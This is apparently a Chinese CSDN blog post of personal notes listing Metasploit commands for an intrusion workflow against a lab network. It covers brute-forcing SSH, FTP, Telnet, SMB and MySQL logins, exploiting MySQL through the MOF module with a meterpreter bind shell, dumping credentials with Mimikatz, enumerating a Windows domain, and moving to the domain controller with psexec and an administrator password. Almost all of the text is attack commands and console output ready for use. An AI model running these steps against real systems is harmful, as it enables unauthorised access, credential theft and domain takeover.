msf+mysql+弱口令爆破_msf各种弱口令爆破

本文详细记录了使用Metasploit进行弱口令爆破的过程,包括SSH、FTP、Telnet、SMB和MySQL的爆破方法。此外,还介绍了如何利用Mof模块获取权限,以及使用Mimikatz导出域内用户信息和反弹Shell的相关操作。
摘要由CSDN通过智能技术生成

Msf:

写的很乱 记录下msf各个爆破弱口令的模块

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用扫描模块

use scanner/portscan/tcp

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login

爆破smb

auxiliary/scanner/smb/smb_login

爆破Mysql

use scanner/mysql/mysql_login

msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt

PASS_FILE => /root/passlist.txt

使用mof模块进行权限获取

use windows/mysql/mysql_mof

msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456

PASSWORD => 123456

msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3

rhost => 10.10.1.3

msf exploit(windows/mysql/mysql_mof) > set USERNAME root

USERNAME => root

msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/mysql/mysql_mof) > exploit

Mimikatz导出hash

meterpreter > load mimikatz

meterpreter > kerberos

一些域内的命令

查看域

net view /domain

查看当前域中的计算机

net view

查看CORP域中的计算机

net view /domain:CORP

Ping计算机名可以得到IP

ping Wangsong-PC

获取所有域的用户列表

net user /domain

获取域用户组信息

net group /domain

获取当前域管理员信息

net group "domain admins" /domain

查看域时间及域服务器的名字

net time /domain

net time /domain 就可以知道域的计算机名

WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控

net group "domain admins" /domain

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2

RHOST => 10.10.1.2

msf exploit(windows/smb/psexec) > set SMBDomain moonsec

SMBDomain => moonsec

msf exploit(windows/smb/psexec) > set SMBUser administrator

SMBUser => administrator

msf exploit(windows/smb/psexec) > set SMBPass xxx123456..

SMBPass => xxx123456..

msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/smb/psexec) > exploit

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值